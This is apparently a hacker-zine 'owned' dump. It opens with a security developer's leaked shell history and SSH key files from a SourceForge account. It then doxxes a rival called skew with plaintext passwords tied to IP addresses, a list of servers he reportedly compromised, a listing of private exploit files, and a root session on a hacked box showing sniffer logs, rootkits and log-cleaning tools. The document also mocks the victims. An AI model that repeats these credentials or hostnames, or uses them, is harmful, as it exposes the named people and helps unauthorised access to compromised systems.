'\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" make cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" ./php test.php > yyyy php test.php > yyyy ./php test.php > yyyy gdb ./php ./php test.php > yyyy gdb ./php ./php test.php > yyyy ./php test.php > yyyy gdb ./php gdb ./php cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" gdb ./php cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" PROMPT_COMMAND='pwd>&7;kill -STOP $$' cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\132\145\156\144'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" make cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" gdb ./php cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" gdb ./php gdb ./php cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`" gcc -c test.s gcc -c test.s objdump --disassemble test.o cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`" PROMPT_COMMAND='pwd>&7;kill -STOP $$' gcc -c test.s objdump --disassemble test.o cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" gdb ./php cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162'`" cd "`echo -e '\057\150\157\155\145\057\165\163\145\162\163\057\163\057\163\145\057\163\145\163\163\145\162\057\160\150\160\055\064\056\063\056\071\057\163\141\160\151\057\143\154\151'`" ls cd php-4.3.9 make mc make clean cd .. make clean ls ls -la libtool ./configure --disable-cgi --without-mysql make mc make mc man strtok make clean cd .. make distclean mc make make test ls cd sapi/cli ls objdump --disassemble php objdump --disassemble php zend_hash_destroy ls -,la ls -la man objdump objdump --disassemble php > php_dis mc cat test.php gdb php ls cd .. gdb php ls -la cd sapi cd cli ls rm -rf test.php rm -rf yyyy cd .. ls cd .. ls rm -rf php-5.0.0RC3.hardened.alpha/ rm -rf php-5.0.0RC3.hardened.alpha/ & ls gcc -o x x.c -m64 cc -o x x.c -m64 exit cd php-4.3.9 ls make distclean ls ./config.nice lex ./configure --help | more ls ./config.nice mc exit ls cd php-4.3.9 make distclean ls ./config.nice ls exit ls cd php-4.3.9 ./config.nice mc ls cat config.log | more ls vi ./configure ./config.nice vi ./configure ./config.nice CFLAGS=-m64 ./config.nice make ls mc ls cd sapi ls cd cli objdump objdump --disassemble php > php.dis cat php.dis | less objdump --disassemble-all php > php.dis cat php.dis | less ls mcedit sparc.s vi sparc.s ls cd php-4.3.9 ls cd sapi ls cd cli ls cat php.dis | more cat php.dis | less cat php.dis | grep jump cat php.dis | less ls cd . cd .. cd .. ls cd .. ls vi sparc.s gcc -m64 -c sparc.s vi sparc.s gcc -m64 -c sparc.s vi sparc.s gcc -m64 -c sparc.s vi sparc.s ls -la objdump --disassemble-all sparc.o quit vi sparc.s gcc -m64 -c sparc.s objdump --disassemble-all sparc.o cd php-4.3.9/sapi/cli/ cat php.dis | less ls cd .. ls cd .. ls cd .. ls vi sparc.s ls gcc -m64 -c sparc.s cat sparc.s vi t.c gcc -m64 -o t t.c sparc.o vi t.c vi t.c vi main gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o vi t.c vi t.c gcc -m64 -o t t.c sparc.o vi sparc.s gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o ./t gdb ./t ps -ax vi t.c ls ls -la gdb --core=core ls vi sparc.s gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o ./t gdb --core=core gdb ./t exit gdb ./t ls vi sparc.s gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o objdump --disassemble-all t | more objdump --disassemble t | more ls vi sparc.s ./t gdb --core=core ls vi sparc.s gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o ./t gdb --core=core vi sparc.s gcc -m64 -o t t.c sparc.o gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o ./t gdb --core=core gcc -c sparc.s vi sparc.s gcc -c sparc.s vi sparc.s ls vi t.c gcc -m64 -o t t.c sparc.o vi sparc.s gcc -c sparc.s gcc -c sparc.s -m64 gcc -m64 -o t t.c sparc.o objdump --disassemble t | more cd php-4.3.9/sapi/cli cat php.dis |less ls cd .. cd .. ls cd .. ls vi sparc.s gcc -m64 -c sparc.s vi sparc.s gcc -m64 -c sparc.s vi sparc.s gcc -m64 -c sparc.s gcc -m64 -o t t.c sparc.o objdump --disassemble t | more quit exit gcc -o p p.c ./p vi p.c gcc -o p p.c ./p vi p.c gcc -o p p.c ./p vi p.c exit ls exit ls gunzip hardened-php-4.3.10-0.2.4.patch.gz ; tar xfz php-4.3.10.tar.gz ; rm -rf php-4.3.9 ; rm -rf php-5.0.0RC3.hardened.alpha ; rm -rf php-4.3.9.tar.bz2 ; cd php-4.3.10 ; patch -p1 -i ../hardened-php-4.3.10-0.2.4.patch ; ( ./configure --disable-cgi --without-mysql && make && make test ) mc cat main/php_config.h cat main/php_config.h | grep ZTS cat main/php_config.h | grep TSRM cat TSRM/TSRM.h | grep FETCH ls exit ls uname -a exit ls ls -la cat /etc/compilefarm-hosts nslookup shell exit ls rm -rf hardened-php-4.3.10-0.2.4.patch rm -rf php-4.3.10* exit ls tar xfj php-4.4.0.tar.bz2 cd php-4.4.0/ patch -p 1 -i ../hardening-patch-4.4.0-0.4.3.patch ./configure && make make distclean exit ls cd php-4.4.0 ./configure && make php make test make distclean exit ls cd php-4.4.0 ./configure && make make test mc exit cat /etc/hosts cat /etc/compilefarm-hosts ssh amd64-linux1 ssh amd64-linux2 exit exit exit ls cd php-4.4.0 make distclean ls ./configure vi configure export TERM=xterm vi configure vi configure ./configure vi configure ./configure vi configure ./configure ./configure export CFLAGS=-m64 ./configure make make test exit cd /usr/share ls cd /usr/local/lib ls cd /usr/share/doc ls cd php4 ls ls -la cd .. cd /usr/share/doc/php4-pear 1~ uname -a exit ls id exit ls vi tmp.c gcc -o tmp tmp.c ./tmp ls -la /tmp ls -la /tmp/php* l ls cat tmp.c exit ls ls -la vi tmp.c export TERM=xterm vi tmp.c gcc -o tmp2 tmp.c ./tmp2 ./tmp2 vi tmp.c ./tmp2 ls rm php* ls gcc -o tmp2 tmp.c ./tmp2 exit ls rm php* gcc -o tmp3 tmp.c ./tmp3 ls -la rm php* ls ls -la /lib ls -la /usr/lib ls -la ldd ldd tmp3 cp /usr/lib/libc.so.1 . ls -la ls exit ls -la hostname exit exit -bash-3.00$ ls -al .ssh total 24 drwxr-xr-x 2 sesser users 4096 Oct 31 23:33 . drwxr-xr-x 7 sesser users 4096 Dec 11 13:58 .. -rw-r--r-- 1 sesser users 1014 Oct 31 23:33 authorized_keys lrwxrwxrwx 1 root root 44 May 23 2005 authorized_keys2 -> /home/users/s/se/sesser/.ssh/authorized_keys -rw------- 1 sesser users 540 Oct 31 23:33 identity -rw-r--r-- 1 sesser users 344 Oct 31 23:33 identity.pub -rw-r--r-- 1 sesser users 1018 Dec 13 2004 known_hosts -bash-3.00$ cat .ssh/known_hosts alpha-linux1 1024 35 142661610879350341359910471229015228681863557274361028972906159368885950729429412070243572601011727293022894294971710488750808642013768282973033828185834438788727862517061993275144181705534556506018164267399772317843039076165952732450937868591345271838554272083652072933542024190556532714720492745111209697383 usf-cf-x86-linux-2,10.8.2.2 1024 35 144347210870008624161092316389337570289598552640606869693267014907110107235922562213496296766734209062113687399129525025829085075420716051620275524781941123288825674755436976445952529574552166131811031107907538556791201407280635865514664841157997240734410466817367385487747269556022421062445416008666512662307 x86-solaris1,10.8.2.23 1024 35 156124405163858389525519490764713367294283674543074297742218100301019637545681376986056756809303328612489667335638024010684487740029490306968634357301793226486480843227248170731904405916788419418635783380129621755044919574758532483804625690298711307770284227997332399767093431422272090601633367092487363364191 -bash-3.00$ cat .ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAuBF1ZxYmADf9Ugfa7JHN2KGNaV50CKhesGjHEra44IiTAIBoCgxPGbzldL3uorecobVqgavbEhrjjSztVEqLHGvnau4xI02AZgfGQ0hmeftLWCt0WrePeuU0HTRrtlIb2ZlTNjxsvFUnPaVeFfPHqWDRZv7SCTJRy4bJk92yVD0= ionic@cryptoland ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA0YfKov2JrPWOLxsoFksbHfj4XavpDQTKAcwle7ME1HSbTDwTAknXwWiBsxKV/JSzfmx0NHqAjV8LQD47yCC5rxCF6spLo0WtuwUrI4MBkdhkihOoqhg3VmlbCpRWTwsrsAh90hAJ9g007COMJRod/6BDHoK9s9OLw2tgUCZ9+mE= sesser@sf ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAwvlC0etEiKAAURisJs46W83kJEq0qX71ZDAlp8LQOa+ib3fBA7b33lNbkskdqDuu+anbIlLeSaQTxIa1kaxezkuksSFwK1cIo72dLaSDMw2/79q5ddPJB4sBQ60qGhb9zHQb7Q9KNA9HnyGYSMPog+pMrUL1R7a2MsohTRZM+hU= sesser@homebase 1024 35 143808617116634468337205489233272089485466682703555064206019641978897347333998435917695364538885745044943180415451840091912076126510412685627256983904948428717832714701391874570859361167980010259540104452327066697219794918919758471872243099024807933269046053582569275522091111562938360375588144850293713813871 sesser@cf.sourceforge.net -bash-3.00$ exit -~-~-~ l3tz try 4n0th3r b0x -~-~-~ [sesser@sc8-pr-shell1 sesser]$ ls -al total 4084 drwxr-xr-x 7 sesser users 4096 Nov 23 2005 . drwxr-xr-x 654 root root 12288 Jul 19 00:30 .. -rw------- 1 sesser users 4949 Nov 27 2005 .bash_history -rw-r--r-- 1 sesser users 24 Jan 23 2004 .bash_logout -rw-r--r-- 1 sesser users 191 Jan 23 2004 .bash_profile -rw-r--r-- 1 sesser users 124 Jan 23 2004 .bashrc -rw-r--r-- 1 sesser users 5531 Jan 23 2004 .canna -rw-r--r-- 1 sesser users 847 Jan 23 2004 .emacs drwx------ 2 sesser users 4096 May 30 2005 .gnupg drwxr-xr-x 14 sesser users 4096 Jul 11 2005 php-4.4.0 -rw-r--r-- 1 sesser users 4086074 Oct 18 2005 php-4.4.0.tar.bz2 drwxr-xr-x 3 sesser users 4096 Oct 18 2005 sesser@cf.sf.net drwxr-xr-x 2 sesser users 4096 Jul 5 08:30 .ssh -rw------- 1 sesser users 11220 Nov 23 2005 .viminfo drwxr-xr-x 2 sesser users 4096 Jan 23 2004 .xemacs -rw-r--r-- 1 sesser users 220 Jan 23 2004 .zshrc -rw-r--r-- 1 sesser users 220 Jan 23 2004 .zshrc.rpmnew [sesser@sc8-pr-shell1 sesser]$ cat .bash_history ls cd /home/groups/g/gc/gc-linux/htdocs/do cd /home/groups/g/gc/gc-linux/htdocs/down/ ls ls -la cd /home/groups/g/gc/gc-linux/htdocs/down ls rm DOL.rar ls -la ls -la cd /shares cd /home/groups/b/ba/bastard ls ls -la cd log ls cd .. cd htdocs ls ls -la cd apj ls cat index.html cd ~ cd /home/groups/h/ha/hardened-php/ ls cd htdocs ls vi index.php vi index.php cd /home/groups/h/ha/hardened-php/htdocs/ vi index.php cd /home/groups/h/ha/hardened-php/htdocs/ vi index.php cd /home/groups/h/ha/hardened-php/htdocs ls vi index.php nano index.php nano index.php nano index.php cd /home/groups/h/ha/hardened-php ls cd htdocs ls vi index.php vi top.php ls vi index.php whois phpwned.com exit ls cd /home/groups/h/ha/hardened-php/htdocs/ ls vi download.php vi news.php vi news.php vi news.php vi download.php cp exploits.php exploits2.php vi exploits2.php vi exploits2.php vi exploits2.php vi exploits2.php vi exploits2.php cp documentation.php advisory-012004.php vi advisory-012004.php cp exploits2.php exploits.php cd advisories ls cd .. vi advisory-012004.php cd /home/groups/h/ha/hardened-php cd htdoc cd htdocs ls vi exploits vi exploits.php vi exploits.php cd /home/groups/h/ha/hardened-php/ cd htdocs/ vi exploits.php vi exploits.php vi exploits.php cd /home/groups/h/ha/hardened-php/htdocs ls vi download.php vi features.php vi news.php vi index.php cd /home/groups/h/ha/hardened-php/htcods cd /home/groups/h/ha/hardened-php/htdocs ls cd ls ls -la ls cd .ssh ls cat authorized_keys2 cat authorized_keys exit cd /home/groups cd h/ha/hardened-php/ ls cd htdoc l scd htdocs/ cd htdocs/ ls vi index.php vi top.php ls vi index.php whois phpwned.com exit ls cd /home/groups/h/ha/hardened-php/htcods cd /home/groups/h/ha/hardened-php/htdocs ls vi news.php vi news.php vi download.php ls cd /home/groups/h/ha/hardened-php/htdocs ls cp news.php exploits.php vi exploits.php vi top.php vi exploits.php vi exploits.php cd /home/groups/h/ha/hardened-php/htdocs/ ls vi download.php vi news.php vi news.php vi news.php vi download.php cp exploits.php exploits2.php vi exploits2.php vi exploits2.php vi exploits2.php vi exploits2.php vi exploits2.php cp documentation.php advisory-012004.php vi advisory-012004.php cp exploits2.php exploits.php cd advisories ls cd .. vi advisory-012004.php cd /home/groups/h/ha/hardened-php cd htdoc cd htdocs ls vi exploits vi exploits.php vi exploits.php cd /home/groups/h/ha/hardened-php/ cd htdocs/ vi exploits.php vi exploits.php vi exploits.php cd /home/groups/h/ha/hardened-php/htdocs ls vi download.php vi features.php vi news.php vi index.php cd /home/groups/h/ha/hardened-php/htcods cd /home/groups/h/ha/hardened-php/htdocs ls cp exploits.php exploits2.php vi exploits2.php vi exploits2.php vi getfile.php ls -la cp punbb_change_email.732578.py exploit.1.xdfhuj vi getfile.php vi getfile.php vi getfile.php cat exploits2.php vi exploits2.php vi getfile.php vi getfile.php vi getfile.php vi getfile.php cd /home/groups/h/ha/hardened-php/htdocs/ dos2unix dos2unic exploit.1.xdfhuj dos2unix exploit.1.xdfhuj ls -la *.py ls -la ex*1* chmod a+r exploit.1.xdfhuj mv exploit.1.xdfhuj exploit.1.xdfhuj.1 vi getfile.php exit cd /home/groups/h/ha/hardened-php/htdocs vi index.php vi index.php vi index.php vi index.php cd /home/groups/h/ha/hardened-php/htdocs/ vi index.php vi index.php vi index.php vi index.php vi /home/groups/h/ha/hardened-php/htdocs/top.php cd /home/groups/h/ha/hardened-php/htdocs/ vi news.php vi news.php cd /home/groups/h/ha/hardened-php/htdocs/ vi download.php cd /home/groups/h/ha/hardened-php/htdocs ls vi hardened-php-signature-key.asc ls vi hard.txt gpg gpg --import-key hardened-php-signature-key.asc gpg --import hardened-php-signature-key.asc ls *.sig gpg *.sig gpg hardened-php-5.0.4-0.2.7.patch.gz.sig gpg hardened-php-5.0.3-0.2.5.patch.gz.sig cd /home/groups/h/ha/hardened-php/htdocs ls vi advisory-012004.php ls cp advisory-012004.php advisory-012005.php mv 012005.txt advisories/ vi advisory-012005.php vi exploits.php vi exploits.php vi exploits.php vi advisories/012005.txt cd /home/groups/h/ha/hardened-php.net cd /home/groups/h/ha/hardened-php/htdocs ls vi news.php exit cd /home/groups/h/ha/Hardened-php/htdocs cd /home/groups/h/ha/hardened-php/htdocs ls vi top.php vi top.php vi index.php vi index.php vi top.php ls -la *.php cat index.php vi preview.php ls -la *.php vi advisory-012004.php vi advisory-012005.php ls -la *.php vi documentation.php ls -la ls -la *.php vi documentation.php ls ls -la ls -la *php vi exploit.php vi exploits.php ls -la *.php vi features.php ls -la *.php vi news.php ls -la ls -la *.php vi news.php ls -la vi preview.php vi download.php cd /home/groups/h/ha/hardened-php/htdocs vi top.php vi news.php cd /home/groups/h/ha/hardened-php/htdocs/ cp advisory-012005.php advisory-022005.php vi advisory-022005.php ls -la cd /home/groups/h/ha/hardened-php/htdocs ls cp advisory-052005.php advisory-062005.php vi advisor*06*php ls vi exploits.php vi exploits.php exit cd /home/groups/h/ha/hardened-php/htdocs/ vi exploits.php cd /home/groups/h/ha/hardened-php/htdocs ls cat punbb_change_email.732578.py exit ls ls -la exit ls -la rm php-4.4.0.tar.gz tar xfj php-4.4.0.tar.bz2 scp -r php-4.4.0 sesser@cf.sf.net scp -r php-4.4.0 sesser@cf.sf.net:. scp -r php-4.4.0 sesser@cf.sourceforge quit exit cd /home/groups/h/ha/hardened-php.net cd /home/groups/h/ha/hardened-php ls cd htdocs ls vi error404.php ls mv index.php index.php.old cp error404.php index.php rm -rf ha* ls -la rm -rf advi* rm ex* y ls -la rm -rf archive.php rm -rf gfx rm -rf htdocs rm -rf index.php.old cat error404.php cp error404.php .. cp index.php .. rm -rf * cp ../index.php . vi .htaccess vi .htaccess exit [sesser@sc8-pr-shell1 hardened-php]$ cd /home/groups/x/xb/xbox-linux/ [sesser@sc8-pr-shell1 xbox-linux]$ ls -al total 32 drwxrwsr-x 7 dummy xbox-linux 4096 Jun 1 02:42 . drwxr-sr-x 116 root root 4096 Jul 17 14:35 .. drwxr-sr-x 2 mist xbox-linux 4096 Jun 1 02:59 backup drwxrwsr-x 2 dummy xbox-linux 4096 Sep 18 2005 cgi-bin drwxrwxr-x 13 vema xbox-linux 4096 Apr 4 05:54 htdocs -rw----rw- 1 vema users 181 Jul 26 2003 .htpasswd drwxr-sr-x 5 paulproteus xbox-linux 4096 Dec 26 2004 moin drwxr-sr-x 2 vema xbox-linux 4096 Oct 17 2004 php g00d j0b s3cur1ty 3xp3rt. wh4t3v3r h4pp3nd t0 y0u h4ck1ng? 05.txt -~-~-~ tal0n g3tz h4x up! well well well.. another episode of tal0n. the only cat cool enough to be in every issue. -------------------------------------------------------------------------------- Checklist: [1] Find Proof Skew is Tal0n. :CHECK [2] Get Into BHUGC/Darkminds Group and Steal Warez. :CHECK [3] Get His Passwdz. :CHECK [4] Get His Shellz. :CHECK [5] Laugh For Dayz At This Dork. :CHECK -------------------------------------------------------------------------------- so lets get this shit started. [1] PROOF SKEW IS TAL0N from sniff logs off of skew's box: (01:50:11) omgseckz : tell me the truth.. are you really tal0n ? (01:50:32) Skew --> http://skew.blackhat.ru: yep.. but dont ever address me as my alter ego again plz [2] GET INTO BHUGC // DARKMINDS AND STEAL WAREZ. from txt file on skew's box: skew'z explaination: BlackHat UnderGround Community is a community of codes in the blackhat community that contribute code on a server that is shared with the other blackhats who have access to it. The community stays updated and more alive when people upload more and more private exploits, tools, shellcodes, and other non-public works of the community member. Currently, we are just starting up and may have a server in a week or so. If you are interested in joining the community, the requirement is when the server is up and we are organized to upload ONE exploit written by yourself and we encourage the uploads to atleast once a month although not required. Ok, looks like no problem gettingin. (NOTE): the only thing skew has coded is imap4life.pl and weve heard rumors someone else coded it. ~-~-~-~-~-~-~-~-~-~-~-~-~-~ skew@krack:~/darkminds$ ls codes/ examples/ exploits/ papers/ research/ skew@krack:~/darkminds$ ls * codes: atomix-newlimit-1.0a.c dfnctsc-kaiten.c door.pl nixfo-ng-1.6.tar.gz scavenge-2.3.0b.zip sh-mirk.tgz sh2-power shaft[priv].tar.gz shaftmaster.c sshbrute.c stj.c examples: fmt/ heap/ stack/ exploits: 0x90_bsd.c* THCREALbad.c* gotfault-exim.tar.gz* imap4life.pl* m00-apache-priv8.tar.gz* m00-smtpclame.c* priv8Xone.c* pwned3* seXFree.c* ttdb_exp.py* 557vnc.extra.c* TTsharefile* h4ckwebdav.tar.gz* kcmshadow.c* m00-deadbear.tar.gz* m00seahouse-1.0.tar.gz* priv8halflife.c* qnx-phfont.c* shoutdead.c* unreal.c* ES-PsyJack.tar.gz* UHAGr-jidentd.tar.gz* hackbsdcpanel.tar.gz* krad2.c* m00-deadbear2.tar.gz* mayday.c* priv8sambar.pl* qnx-phgrafx.c* shv5.tar.gz* winwrk.tar.gz* One-to-rule-them-all.c* bmon2.c* hackbsdkcms.tar.gz* m00-0Wn-0x333.c* m00-deadbear3.tar.gz* openssl-too-open-priv8.tar.gz* proftd_put_down2~m00.c* real_magic.c* subversion.c* wuftpd.tar.gz* THCIISSLame-linux.c* cvs.c* halflife2* m00-SPAm.zip* m00-samba-pwnd.tar.bz2* priv8LEEEET.pl* proftd_put_down2~m002.c* remap_adv.c* tr_tru.pl* xfree.c* papers: research: skew@krack:~/darkminds$ ls */* codes/atomix-newlimit-1.0a.c codes/sshbrute.c exploits/UHAGr-jidentd.tar.gz* exploits/kcmshadow.c* exploits/m00-smtpclame.c* exploits/proftd_put_down2~m002.c* exploits/subversion.c* codes/dfnctsc-kaiten.c codes/stj.c exploits/bmon2.c* exploits/krad2.c* exploits/m00seahouse-1.0.tar.gz* exploits/pwned3* exploits/tr_tru.pl* codes/door.pl exploits/0x90_bsd.c* exploits/cvs.c* exploits/m00-0Wn-0x333.c* exploits/mayday.c* exploits/qnx-phfont.c* exploits/ttdb_exp.py* codes/nixfo-ng-1.6.tar.gz exploits/557vnc.extra.c* exploits/gotfault-exim.tar.gz* exploits/m00-SPAm.zip* exploits/openssl-too-open-priv8.tar.gz* exploits/qnx-phgrafx.c* exploits/unreal.c* codes/scavenge-2.3.0b.zip exploits/ES-PsyJack.tar.gz* exploits/h4ckwebdav.tar.gz* exploits/m00-apache-priv8.tar.gz* exploits/priv8LEEEET.pl* exploits/real_magic.c* exploits/winwrk.tar.gz* codes/sh-mirk.tgz exploits/One-to-rule-them-all.c* exploits/hackbsdcpanel.tar.gz* exploits/m00-deadbear.tar.gz* exploits/priv8Xone.c* exploits/remap_adv.c* exploits/wuftpd.tar.gz* codes/sh2-power exploits/THCIISSLame-linux.c* exploits/hackbsdkcms.tar.gz* exploits/m00-deadbear2.tar.gz* exploits/priv8halflife.c* exploits/seXFree.c* exploits/xfree.c* codes/shaft[priv].tar.gz exploits/THCREALbad.c* exploits/halflife2* exploits/m00-deadbear3.tar.gz* exploits/priv8sambar.pl* exploits/shoutdead.c* codes/shaftmaster.c exploits/TTsharefile* exploits/imap4life.pl* exploits/m00-samba-pwnd.tar.bz2* exploits/proftd_put_down2~m00.c* exploits/shv5.tar.gz* examples/fmt: server-remote.c examples/heap: heap.c examples/stack: client-remote.c local.c local2.c server-remote.c ~-~-~-~-~-~-~-~-~-~-~-~-~-~ [3] GET HIS PASSWORDZ. 24.177.23.252 skew:5ubiZ3r0 skewtty.dyndns.org 212.202.49.153 skew:*jd4^52h*d2= ~-~ skew rooted boxes ~-~ plet.compumail.co.za knysna.compumail.co.za umhlanga.compumail.co.za lin02.compumail.co.za histologic.no-ip.info irenefw.irenecountrylodge.co.za 196.25.22.178 [4] GET HIS SHELLZ: ~-~-~-~-~-~-~-~-~-~-~-~-~-~ skew @ plet: Here we learn Skew has mad eleet codes and sshbrute'z like a bitch. ~-~-~-~-~-~-~-~-~-~-~-~-~-~ login as: root root@plet's password: [root@plet root]# cd /tmp/ [root@plet tmp]# ls -al total 14 drwxrwxrwt 5 root root 360 Jun 14 01:28 ./ drwxr-xr-x 21 root adm 880 May 30 08:20 ../ d--S--S--T 18 root root 1416 Jun 14 01:00 .../ -rw-rw-rw- 1 ratana_g ratana_g 4 Jun 13 15:00 .900.f5a648 drwxrwxrwt 2 xfs xfs 72 Sep 12 2003 .font-unix/ srw------- 1 root root 0 May 22 10:14 .fsav-0= srw------- 1 root root 0 Jun 14 01:28 .fsav-0-sa= -rw-r--r-- 1 root root 0 Jun 13 04:10 authfail.log.unsort -rw-r--r-- 1 root root 0 Jun 13 04:10 denied.log.unsort -rw-r--r-- 1 root root 554 Jun 14 00:58 ls -rw-r--r-- 1 root root 0 Jun 13 04:10 sarg.log.unsort drwx------ 2 root root 80 Feb 27 2003 ssh-XXE002K6/ [root@plet tmp]# cd ... [root@plet ...]# ls -al total 159052 d--S--S--T 18 root root 1416 Jun 14 01:00 ./ drwxrwxrwt 5 root root 360 Jun 14 01:30 ../ -rw-r--r-- 1 root root 21788442 Jun 14 01:30 .sniff -rw-r--r-- 1 root root 121983894 Jan 1 18:25 .sniff.old -rw-r--r-- 1 root root 6178477 May 20 08:28 .sniff.old2 drwxr-xr-x 12 dlv_bern 1038 1200 Apr 23 20:36 BitchX/ drwxr-sr-x 2 root root 120 Jun 8 04:33 afp/ drwxrwxrwx 8 3232 ntools 928 Jan 14 06:35 cfengine-2.0.7/ -rw-r--r-- 1 root root 1190033 May 15 2003 cfengine-2.0.7.tar.gz drwxr-sr-x 2 root root 96 Jun 8 18:12 cimap/ drwxr-xr-x 10 1001 wheel 864 Jun 11 15:54 h4ckwebdav/ -rw-r--r-- 1 root root 405818 Jun 11 15:51 h4ckwebdav.tar.gz -rwx------ 1 root root 12014 Sep 14 2004 hide* drwxr-sr-x 2 root root 152 Jun 6 17:31 imap/ -rw-r--r-- 1 root root 6550 Apr 23 20:32 index.html -rw-r--r-- 1 root root 2532476 Mar 27 2004 ircii-pana-1.1-final.tar.gz -rw-r--r-- 1 root root 1153560 Dec 11 2003 irssi-0.8.9.tar.gz drwxr-sr-x 5 root root 144 May 12 23:33 john-1.6/ -rw-r--r-- 1 root root 497341 Sep 18 1999 john-1.6.tar.gz -rw-r--r-- 1 root root 0 Jun 13 05:41 mail.hm drwxrwxrwx 32 1000 1000 1416 May 28 08:05 mailutils-0.6/ -rw-r--r-- 1 root root 2837017 Dec 23 20:19 mailutils-0.6.tar.gz drwxrwxrwx 4 500 frog_rud 1824 Jun 8 15:42 nano-1.2.5/ -rw-r--r-- 1 root root 911938 May 16 06:06 nano-1.2.5.tar.gz -rw-r--r-- 1 root root 1846196 Apr 24 08:58 nmap-3.81.tgz -rw-r--r-- 1 root root 2105 Dec 11 2004 nmap.log drwxrwxr-x 7 500 frog_rud 10768 Jun 8 15:56 openssh-3.4p1/ -rw-r--r-- 1 root root 837668 Sep 17 2002 openssh-3.4p1.tar.gz -rw-r--r-- 1 root root 312224 Jun 24 2004 psyBNC2.3.1.tar.gz drwxrwxr-x 11 root root 728 Mar 9 08:58 psybnc/ drwxr-sr-x 2 root root 176 May 27 21:41 rlogin/ -rw------- 1 1010 dlv_bern 263 Feb 18 2000 rootkitutil.h drwxr-xr-x 3 root wheel 216 Jan 2 07:58 shoutcast-1-9-4-linux-glibc6/ -rw-r--r-- 1 root root 152616 Mar 18 2004 shoutcast-1-9-4-linux-glibc6.tar.gz drwxr-xr-x 2 root root 632 May 11 23:10 shroud-1.30/ -rw-r--r-- 1 root root 9248 Nov 3 2002 shroud-1.30.tgz -rwxr-xr-x 1 root root 20416 May 13 00:43 sol* -rw-r--r-- 1 root root 12529 May 13 00:42 sol.c drwxr-sr-x 2 root root 256 Jun 12 03:37 sshbrute/ -rw-r--r-- 1 root root 2402 Jun 10 06:21 ssheist-1.log drwxr-sr-x 3 root root 656 May 12 04:03 synscan/ -rw-r--r-- 1 root root 53939 Mar 22 2002 synscan1.6.tar.gz -rwxr-xr-x 1 root root 19860 May 11 23:13 vanish2* -rw------- 1 1010 dlv_bern 8525 Feb 18 2000 vanish2.c -rw-r--r-- 1 root root 3256 Feb 18 2000 vanish2.tgz [root@plet ...]# head -n 2 nmap.log 